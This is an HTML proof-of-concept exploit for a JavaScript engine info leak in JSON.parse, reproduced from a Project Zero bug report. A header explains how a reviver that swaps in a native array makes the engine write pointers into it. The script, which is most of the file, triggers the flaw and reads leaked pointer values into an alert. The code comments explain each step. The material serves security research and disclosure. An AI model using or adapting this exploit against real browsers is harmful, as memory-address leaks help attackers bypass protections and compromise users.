<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=952
|
|
|
|
There is an info leak in JSON.parse. If this function is called with a reviver, and the reviver modifies the output object to contain a native array, the Walk function assumes that this array is a Var array, and writes pointers to it. These pointers can then be read out of the array by script.
|
|
|
|
A minimal PoC is as follows:
|
|
|
|
var once = false;
|
|
var a = 1;
|
|
|
|
function f(){
|
|
if(!once){
|
|
a = new Array(1, 2, 3);
|
|
this[2] = a;
|
|
}
|
|
once = true;
|
|
return {};
|
|
|
|
}
|
|
|
|
|
|
JSON.parse("[1, 2, [4, 5]]", f);
|
|
|
|
A full PoC is attached. When loaded in a browser, this PoC will display pointers in an alert dialog.
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
|
|
// `once` gates the reviver below so that only its first invocation tampers
// with the holder; `a` is overwritten with a native array on that call and
// is read back after JSON.parse returns.
var once = false;
var a = 1;
|
|
|
|
|
|
// JSON.parse reviver (see the JSON.parse call below). A reviver is called
// for every parsed value with `this` bound to the holder object or array.
// On its first call it stores a freshly created native array into the
// holder at index 2, so the engine's reviver walk later reaches a native
// array where it expects the Var array it built itself — that type
// confusion is the bug described in the header comment. Every call returns
// an empty object, which becomes the revived value at that position.
function f(){
// Only the first invocation modifies the holder; `once` is a global flag.
if(!once){
a = new Array(1, 2, 3);
this[2] = a;
}
once = true;
//alert("f " + this);
return {};
}
|
|
|
|
|
|
// Trigger the walk: the reviver runs for the elements of the outer array,
// and by the time index 2 is visited it has been replaced by the native
// array `a` (see f above).
JSON.parse("[1, 2, [4, 5]]", f);
// Read back what the walk left in `a`. Per the header comment, on an
// unpatched engine these slots hold pointer values; the `>> 1` presumably
// strips a low tag bit — TODO confirm against the engine's value encoding.
// The results are shown as hex strings in an alert dialog.
var n = new Number(a[0]);
n = n >> 1;
var s = n.toString(16);
n = new Number(a[1]);
n = n >> 1;
s = s + n.toString(16);
// NOTE(review): `n` is a primitive after `>> 1`, so this assignment is
// silently ignored in sloppy mode and does not affect `s`; looks like a
// leftover from an earlier version of the PoC.
n.length = 100;
n = new Number(a[2]);
n = n >> 1;
s = s + " " + n.toString(16);
n = new Number(a[3]);
n = n >> 1;
s = s + n.toString(16);
// Browser-only output; the first two values and the last two are
// separated by a space.
alert(s);
|
|
</script>
|
|
</body>
|
|
</html> |